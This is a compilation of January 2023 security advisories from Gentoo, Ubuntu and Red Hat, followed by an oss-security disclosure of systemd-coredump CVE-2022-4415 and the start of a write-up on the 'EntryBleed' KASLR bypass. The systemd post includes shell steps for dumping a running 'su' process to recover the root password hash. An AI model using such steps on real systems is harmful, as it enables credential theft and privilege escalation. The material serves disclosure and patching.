Gentoo Linux Security Advisory 202301-5 - A vulnerability has been discovered in Apache Commons Text which could result in arbitrary code execution. Versions less than 1.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Apache Commons Text: Arbitrary Code Execution  
     Date: January 11, 2023  
     Bugs: #877577  
       ID: 202301-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Apache Commons Text which could  
result in arbitrary code execution.

Background  
==========

Apache Commons Text is a library focused on algorithms working on  
strings.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-java/commons-text      < 1.10.0                    >= 1.10.0

Description  
===========

Apache Commons Text performs variable interpolation, allowing properties  
to be dynamically evaluated and expanded. The standard format for  
interpolation is "${prefix:name}", where "prefix" is used to locate an  
instance of org.apache.commons.text.lookup.StringLookup that performs  
the interpolation. The set of default Lookup instances included  
interpolators that could result in arbitrary code execution or contact  
with remote servers. These lookups are: - "script" - execute expressions  
using the JVM script execution engine (javax.script) - "dns" - resolve  
dns records - "url" - load values from urls, including from remote  
servers Applications using the interpolation defaults in the affected  
versions may be vulnerable to remote code execution or unintentional  
contact with remote servers if untrusted configuration values are used.

Impact  
======

Crafted input to Apache Commons Text could trigger remote code  
execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Apache Commons Text users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-java/commons-text-1.10.0"

References  
==========

[ 1 ] CVE-2022-42889  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42889

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-05

Ubuntu Security Notice 5791-3 - It was discovered that a race condition existed in the Android Binder IPC subsystem in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. David Leadbeater discovered that the netfilter IRC protocol tracking implementation in the Linux Kernel incorrectly handled certain message payloads in some situations. A remote attacker could possibly use this to cause a denial of service or bypass firewall filtering.

==========================================================================  
Ubuntu Security Notice USN-5791-3  
January 10, 2023

linux-azure-5.4, linux-azure-fde vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems  
- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems

Details:

It was discovered that a race condition existed in the Android Binder IPC  
subsystem in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-20421)

David Leadbeater discovered that the netfilter IRC protocol tracking  
implementation in the Linux Kernel incorrectly handled certain message  
payloads in some situations. A remote attacker could possibly use this to  
cause a denial of service or bypass firewall filtering. (CVE-2022-2663)

It was discovered that the Intel 740 frame buffer driver in the Linux  
kernel contained a divide by zero vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2022-3061)

It was discovered that the sound subsystem in the Linux kernel contained a  
race condition in some situations. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2022-3303)

Gwnaun Jung discovered that the SFB packet scheduling implementation in the  
Linux kernel contained a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-3586)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3646)

Hyunwoo Kim discovered that an integer overflow vulnerability existed in  
the PXA3xx graphics driver in the Linux kernel. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2022-39842)

It was discovered that a race condition existed in the EFI capsule loader  
driver in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-40307)

Zheng Wang and Zhuorao Yang discovered that the RealTek RTL8712U wireless  
driver in the Linux kernel contained a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-4095)

It was discovered that the USB monitoring (usbmon) component in the Linux  
kernel did not properly set permissions on memory mapped in to user space  
processes. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-43750)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1100-azure-fde  5.4.0-1100.106+cvm1.1  
   linux-image-azure-fde           5.4.0.1100.106+cvm1.35

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1100-azure    5.4.0-1100.106~18.04.1  
   linux-image-azure               5.4.0.1100.73

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5791-3  
   https://ubuntu.com/security/notices/USN-5791-1  
   CVE-2022-20421, CVE-2022-2663, CVE-2022-3061, CVE-2022-3303,  
   CVE-2022-3586, CVE-2022-3646, CVE-2022-39842, CVE-2022-40307,  
   CVE-2022-4095, CVE-2022-43750

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.4.0-1100.106+cvm1.1  
   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1100.106~18.04.1

Ubuntu Security Notice USN-5791-3

Gentoo Linux Security Advisory 202301-4 - A vulnerability has been discovered in jupyter_core which could allow for the execution of code as another user. Versions less than 4.11.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: jupyter_core: Arbitrary Code Execution  
     Date: January 11, 2023  
     Bugs: #878497  
       ID: 202301-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in jupyter_core which could allow  
for the execution of code as another user.

Background  
==========

jupyter_core contains core Jupyter functionality.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-python/jupyter_core    < 4.11.2                    >= 4.11.2

Description  
===========

jupyter_core trusts files for execution in the current working directory  
without validating ownership of those files.

Impact  
======

By writing to a directory that is used a the current working directory  
for jupyter_core by another user, users can elevate privileges to those  
of another user.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All jupyter_core users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/jupyter_core-4.11.2"

References  
==========

[ 1 ] CVE-2022-39286  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39286

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-04

Gentoo Linux Security Advisory 202301-3 - A vulnerability was found in scikit-learn which could result in denial of service. Versions less than 1.1.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: scikit-learn: Denial of Service  
     Date: January 11, 2023  
     Bugs: #758323  
       ID: 202301-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability was found in scikit-learn which could result in denial  
of service.

Background  
==========

scikit-learn is a machine learning library for Python.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  sci-libs/scikit-learn      < 1.1.1                      >= 1.1.1

Description  
===========

When supplied with a crafted model SVM, predict() can result in a null  
pointer dereference.

Impact  
======

An attcker capable of providing a crafted model to scikit-learn can  
result in denial of service.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All scikit-learn users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sci-libs/scikit-learn-1.1.1"

References  
==========

[ 1 ] CVE-2020-28975  
      https://nvd.nist.gov/vuln/detail/CVE-2020-28975

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-03

Red Hat Security Advisory 2023-0059-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0059-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0059  
Issue date:        2023-01-10  
CVE Names:         CVE-2022-2639   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
kpatch-patch-4_18_0-147_70_1-1-2.el8_1.src.rpm  
kpatch-patch-4_18_0-147_74_1-1-2.el8_1.src.rpm  
kpatch-patch-4_18_0-147_76_1-1-1.el8_1.src.rpm  
kpatch-patch-4_18_0-147_77_1-1-1.el8_1.src.rpm

ppc64le:  
kpatch-patch-4_18_0-147_70_1-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_70_1-debuginfo-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_70_1-debugsource-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_74_1-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_74_1-debuginfo-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_74_1-debugsource-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_76_1-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_76_1-debuginfo-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_76_1-debugsource-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_77_1-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_77_1-debuginfo-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_77_1-debugsource-1-1.el8_1.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-147_70_1-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_70_1-debuginfo-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_70_1-debugsource-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_74_1-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_74_1-debuginfo-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_74_1-debugsource-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_76_1-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_76_1-debuginfo-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_76_1-debugsource-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_77_1-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_77_1-debuginfo-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_77_1-debugsource-1-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY73n79zjgjWX9erEAQgKiQ/+LjewZ+MyCvWJ+qhyPc14GCy51ttayGca  
fO4urBYkA+HH8jal6201GurCnpquoQsD7CtLW4A3LUeNezKHRVW0v4B7LqqBjTuK  
aOXFHApMMF4Hrw1baJnRZq9hF2HLsFA1435v34de6GvNpfvvEBzkrKhrNu45MRf1  
Al1I6094u9AIwM/Q67bubgCz51kIXNZX7F4fFygHBMFkW2czAdCTccftW5/+Fw60  
13iu/LNsY8UnBKxKYrHkcSBenPEklUFyh1l5FR8oZ3+ao/0oNlC4hoM4zmpY8foi  
pBUEtmjGbTLhuMha+1iF3vhTrXK7x6gXWV7JOaZzSM1SvQOjTtAVIcOw94co0pTM  
47tfm5uID2bqG9/a0m3sGUkzFd/zh+4sbyKi4un6D5qxVIZ3ZCa0wNGA0PkAiuGb  
DusgVo1ws5e7mEjpa/Ec2IE4WswT5+HJwACrizbrSsk/q0DhKLQibdgjkS4Xtoe7  
tLdxTYT67dTSnbPjH8WihyNnwuBJTjVOATFeWrjoD7dERXHGxE7wI+mwdzadgz3i  
BibnUT03fXgc0nPoyNmJ20neGKjKkWyx7P0fK1DHbfreOe9sIizqwVzthVIphZcJ  
dgkr/6ML9/NI7GvPXbgwBa9mMEzge7CnwQoXOCmztOLqcFpxuwKHfX5nsJLTMCE1  
VQfi2bo2zrA=  
=qZYv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0059-01

Gentoo Linux Security Advisory 202301-2 - Multiple vulnerabilities have been discovered in Twisted, the worst of which could result in denial of service. Versions less than 22.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Twisted: Multiple Vulnerabilities  
     Date: January 11, 2023  
     Bugs: #878499, #834542, #832875  
       ID: 202301-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Twisted, the worst of  
which could result in denial of service.

Background  
==========

Twisted is an asynchronous networking framework written in Python.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-python/twisted         < 22.10.0                  >= 22.10.0

Description  
===========

Multiple vulnerabilities have been discovered in Twisted. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Twisted users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/twisted-22.10.0"

References  
==========

[ 1 ] CVE-2022-21712  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21712  
[ 2 ] CVE-2022-21716  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21716  
[ 3 ] CVE-2022-39348  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39348

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-02

A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 21 Dec 2022 12:51:24 +0100
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: systemd-coredump: CVE-2022-4415: local information leak due to
 systemd-coredump not respecting fs.suid\_dumpable kernel setting

Hello list,

this is the publication of a report that was privately shared with the
linux-distros mailing list on 2022-12-09 with a communicated coordinated
release date of 2022-12-20.

I made small changes to the report to reflect recent developments.

This report is about a security issue I found in systemd-coredump.
systemd-coredump is a userspace coredump handler for Linux that is part
of the systemd suite \[1\].

\[1\]: https://github.com/systemd/systemd

The Issue
=========

systemd-coredump sets the sysctl fs.suid\_dumpable by default to 2 via
a sysctl.d drop-in configuration file. For the kernel's builtin coredump
handling this setting means that core dumps for setuid (or otherwise
privileged) processes will be written to disk but will only be
accessible to the root user to avoid sensitive data leaking to
unprivileged user accounts. See also \`man 5 proc\` for the full
documentation of this sysctl.

systemd-coredump in userspace, however, does not respect this kernel
setting in the implementation of its coredump handling. The real user ID
of a dumping process will receive read access to the core dump via an
ACL entry:

    someuser$ cat /proc/sys/kernel/core\_pattern
    |/usr/lib/systemd/systemd-coredump %P %u %g %s %t %c %h
    someuser$ cat /cat /proc/sys/fs/suid\_dumpable
    2
    someuser$ /usr/bin/su # run a setuid-root program and keep it running
    Password:
    
    # in another shell trigger a SEGFAULT in the setuid-root program
    someuser$ kill -s SIGSEGV \`pidof su\`
    
    # back in the original shell
    Password: Segmentation fault (core dumped)
    someuser$ cd /var/lib/systemd/coredump
    someuser$ ls -l
    -rw-r-----+ 1 root root 90K Okt 20 11:59 core.su.1000.76f0e40af2a240d98e50b90ab141d974.3529.1666259998000000.zst
    someuser$ getfacl core.su.\*
    # file:
    # core.su.1000.76f0e40af2a240d98e50b90ab141d974.3529.1666259998000000.zst
    # owner: root
    # group: root
    user::rw-
    user:someuser:r--
    group::r--
    mask::r--
    other::---

I have reproduced this on openSUSE Tumbleweed with systemd version 251.
I have been able to reproduce it also on other current Linux
distributions like Arch, Debian, Fedora and SLES.

Patch and Workaround
====================

Attached are the current (two) patches I received from systemd upstream.
Upstream published the fix by now in their GitHub repository \[2\].

A simple workaround without patching systemd-coredump is to revert the
sysctl setting of fs.suid\_dumpable back to 0. In this mode the kernel
will not invoke systemd-coredump for privileged programs. The issue will
thus not be triggered.

\[2\]: https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c

Affected Versions
=================

The vulnerable default of the fs.suid\_dumpable sysctl has been present
since systemd version 246 (introduced via commit 6635f57d3ee). Even
older versions may be affected though, should a system administrator
decide to change this setting to 2.

Upstream states that only systemd starting with version 247 are
affected, I don't know how they come to this different conclusion.

Upstream also states that only builds of systemd with libacl support are
affected. This makes sense since the read access to the core dumps is
granted via ACL entries and there is no fallback to this.

Exploit and Severity
====================

Exploiting this issue is pretty simple at the outset. Regular users are
allowed to send arbitrary signals to privileged processes they create.
Thus the privileged processes can be forced to dump core at arbitrary
points in time and the memory contents of the program will become
accessible via systemd-coredump.

Whether data obtained this way allows for a relevant information leak
depends on the timing, on the one hand, and on the type of program
executed on the other hand. What comes to mind is attempting to obtain
the password hash for the root user account that is stored in
/etc/shadow. Tools like 'su' and 'sudo' will have to process these
password hashes when authenticating the invoking user.

With 'sudo' this will not work, because it actively sets the ulimit for
coredumps to 0. The reason for this is to protect against exactly this
attack scenario \[3\].

With 'su' it works, however. Attached you can find a Python script I
created that shows that it is relatively simple to obtain the root
user's hash digest from /etc/shadow. From here on an attacker can
attempt to crack the hash using a GPU rig, for example. While it is not
a simple local root exploit it can be one if there is a dedicated
attacker.

Other setuid programs (or also programs running only with certain raised
Linux capabilties) could allow for different kinds of information leaks.
Even for 'su' it depends a lot on the PAM stack configuration. Some PAM
modules might read in data from private files in the target user's home
directory, or private configuration files which could leak via
systemd-coredump.

\[3\]: https://github.com/sudo-project/sudo/blob/3040bf54c99ed1baa9e7006be2fed3d5fa71f80e/docs/sudo.man.in#L1260

Timeline
========

2022-10-20: I sent a first report and some questions to
            systemd-security@...hat.com, offering coordinated disclosure.
2022-11-28: Communication did not progress much; I investigated the issue
            further by creating a PoC. Upstream confirmed the issue now and
            acknowledged a higher severity than initially considered.
2022-12-09: The final patches have been shared with us and we agreed to
            the CRD 2022-20-20. I shared the report with the
	    linux-distros mailing list.
2022-12-12: The CVE assignment was communicated by upstream and I also
            shared it with the linux-distros mailing list.
2022-12-20: Upstream published the fix.

Regards

Matthias

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Security Engineer
https://www.suse.com/security
GPG Key ID: 0x14C405C971923553
 
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

**View attachment "**0001-coredump-adjust-whitespace.patch**" of type "**text/plain**" (5417 bytes)**

**View attachment "**0002-coredump-do-not-allow-user-to-access-coredumps-with-.patch**" of type "**text/plain**" (15695 bytes)**

**View attachment "**su\_core\_shadow\_extract.py**" of type "**text/plain**" (6337 bytes)**

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (834 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-4415: security - systemd-coredump: CVE-2022-4415: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting

A flaw named "EntryBleed" was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems.

Recently, I’ve discovered that Linux KPTI has implementation issues that can allow any unprivileged local attacker to bypass KASLR on Intel based systems. While technically only an info-leak, it still provides a primitive that has serious implications for bugs previously considered too hard to exploit and was assigned CVE-2022-4543. As you’ll see why from the writeup later on, I have decided to term this attack “EntryBleed.”

KPTI (or its original name KAISER) stands for Kernel Page Table Isolation. It was introduced as a patch for the Meltdown micro-architectural vulnerabilities a few years ago, where unprivileged attackers could utilize a side channel to bypass KASLR. According to documentation, KPTI basically splits apart the user and kernel page tables for each process. The kernel still has all of userspace virtual memory mapped in, but with the NX bit set; the user on the other hand will only have the minimal amount of kernel virtual memory mapped in, like exception/syscall entry handlers and anything else necessary for the user to kernel transition. KAISER actually stood for “Kernel Address Isolation to have Side-channels Efficiently Removed” and predates Meltdown, as other side-channel bypasses were already known to be an issue. If part of KPTI’s purpose is to act as a barrier against KASLR bypasses for CPU side-channel attacks, then clearly it has failed as of this post.

In 2016, Daniel Gruss discovered the concept of the prefetch sidechannel. I used one variant of it, which specifically utilized the TLB (the caching mechanism for virtual to physical address translations) as a side-channel mechanism. x86\_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch will finish quickly if the address being loaded is already present in the TLB, but will finish slower when the address is not present (and a page table walk needs to be done). At its time, it was known that ASLR (and KASLR) could be bypassed by timing prefetches across a potential range of addresses using high resolution timing instructions like “RDTSC.”

Before I continue with the attack, it must be noted that my main inspiration came from Google ProjectZero’s recent blogpost on exploiting CVE-2022-42703. In the final section of the blogpost, they discuss how KPTI has been left off as more modern CPUs have Meltdown mitigations in silicon, but this makes them vulnerable to prefetch again. In this case, one would just assume “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which would make perfect sense based on the purpose of KPTI/KAISER and seemed to be the consensus when talking to a few other security researcher friends.

For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that is still mapped while userspace code is running could be located with prefetch techniques. After an hour of digging, I noticed the following. In syscall_init, the address of entry_SYSCALL_64 (which is at a constant offset from KASLR base based on /proc/kallsyms) is stored in the LSTAR MSR, which holds the address of the kernel’s handler for when a 64 bit syscall gets executed. Notice how the handler executes a few instructions first before switching to the kernel CR3 (if KPTI is on) - this means that this function has to still be mapped in userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same address in userland as it is in kernel using its KASLR rebased address - this sounds very suspicious!

At this point, I was quite confident that a prefetch side-channel could reveal the location of entry\_SYSCALL\_64, and since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page with entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then prefetch side-channel the possible range of addresses for that handler (as the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000). 

An astute reader might wonder how the entry is preserved upon returning to userland despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page's page table entry, which would protect it from TLB invalidation on mov instructions to CR3. In fact, PTI documentation says the following: "global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables." I originally suspected that PCID (which introduces separate TLB contexts to lower the occurrence of invalidation using the lower 12 bits of CR3) was the root cause as it often appears in discussions about performance optimization of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I'm misunderstanding the code, so it would be great if someone can correct me if I'm wrong here.

Anyways, the resulting bypass is extremely simple. Unlike some other uarch attacks, it seems to work fine under normal load in normal systems, and I can deduce KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped with a fence instruction for it to work in VMs (credit goes to p0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted based on kernel by setting it to the distance between it and startup\_64):

